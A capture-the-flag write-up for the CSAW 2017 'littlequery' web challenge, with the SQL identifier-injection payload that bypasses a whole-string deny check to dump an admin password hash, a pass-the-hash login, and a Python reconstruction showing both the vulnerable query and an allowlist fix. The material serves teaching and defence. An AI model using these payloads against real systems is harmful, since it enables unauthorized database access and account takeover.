CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup
problem description
LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io
In the source of the first page there is an HTML comment containing a link (labelled "API") to an API endpoint:
/api/db_explore.php
Requesting it without parameters tells us what it expects:
Must specify mode={schema|preview}
Let's try schema first:
http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema
{"dbs":["littlequery"]}
This mode lets us walk the database structure, down to the columns of a table:
http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user
{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}
If we try to read the contents with preview, we are blocked:
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user
Database 'littlequery' is not allowed to be previewed.
But this looks like a dummy filter that only compares the whole db value. Changing it to something that does not exist gives a different, more interesting error:
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user
`littlequeryTEST`.`user` doesn't exist.
Both names are echoed back inside backticks, so the query is presumably built somehow like this:
select * from `$db`.`$table`
The filter only rejects the exact string littlequery in the db parameter, and the identifiers are interpolated into the query unescaped (escaping would not help anyway, since these are backtick-quoted identifiers rather than string literals). So we close the backtick ourselves, supply the table name inside db, and comment out the rest with `-- -` (the %20 is the space MySQL requires after --):
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=
[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]
And there you have the admin password hash.
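To make the bypass concrete, here is an added example (not code from the challenge; the real PHP source was never published) that reconstructs the behaviour inferred above. It stands up an in-memory SQLite database named littlequery (SQLite accepts backtick-quoted identifiers and `schema`.`table` references for attached databases, so the same payload parses), reproduces the whole-string deny check, and shows the payload returning the admin row. The hardened version, also an assumption of mine, validates both names as plain identifiers before the deny check, which is the fix for identifier injection (an escape function for string literals does not apply here).

```python
import re
import sqlite3

ADMIN_HASH = "5896e92d38ee883cc09ad6f88df4934f6b074cf8"


def make_db():
    """Constructed stand-in for the challenge database (SQLite instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS littlequery")
    conn.execute(
        "CREATE TABLE littlequery.user (uid INTEGER, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO littlequery.user VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.commit()
    return conn


# Assumed: the challenge's filter is a plain equality check on the db parameter.
PREVIEW_DENY = {"littlequery"}


def vulnerable_preview(conn, db, table):
    """Reconstruction of mode=preview as inferred from the API's responses."""
    if db in PREVIEW_DENY:
        return f"Database '{db}' is not allowed to be previewed."
    # Identifiers are interpolated straight into the query: this is the bug.
    query = f"select * from `{db}`.`{table}`"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.OperationalError:
        return f"`{db}`.`{table}` doesn't exist."


# Only unquoted identifier characters are allowed; backticks, dots, dashes and
# spaces never get near the query, so the deny check compares what SQL will see.
IDENTIFIER = re.compile(r"[A-Za-z0-9_]{1,64}")


def safe_preview(conn, db, table):
    """Hardened variant (my assumption of a fix): allowlist identifiers first."""
    if not IDENTIFIER.fullmatch(db) or not IDENTIFIER.fullmatch(table):
        return "Invalid identifier."
    if db in PREVIEW_DENY:
        return f"Database '{db}' is not allowed to be previewed."
    query = f"select * from `{db}`.`{table}`"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.OperationalError:
        return f"`{db}`.`{table}` doesn't exist."


# The payload from the writeup: db closes its own backtick, names the table,
# and comments out the `.`` that the template appends.
PAYLOAD_DB = "littlequery`.`user`-- -"
PAYLOAD_TABLE = ""

if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_preview(conn, "littlequery", "user"))
    print(vulnerable_preview(conn, "littlequeryTEST", "user"))
    print(vulnerable_preview(conn, PAYLOAD_DB, PAYLOAD_TABLE))
    print(safe_preview(conn, PAYLOAD_DB, PAYLOAD_TABLE))
```

Note that the deny check in vulnerable_preview is not wrong by itself; it is meaningless because the string it compares is not the identifier the database ends up parsing. Once the input is constrained to a single identifier, the same check becomes sound.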
Use it to log in: passing the hash directly in the POST request is accepted, and we get the flag:
flag{mayb3_1ts_t1m3_4_real_real_escape_string?}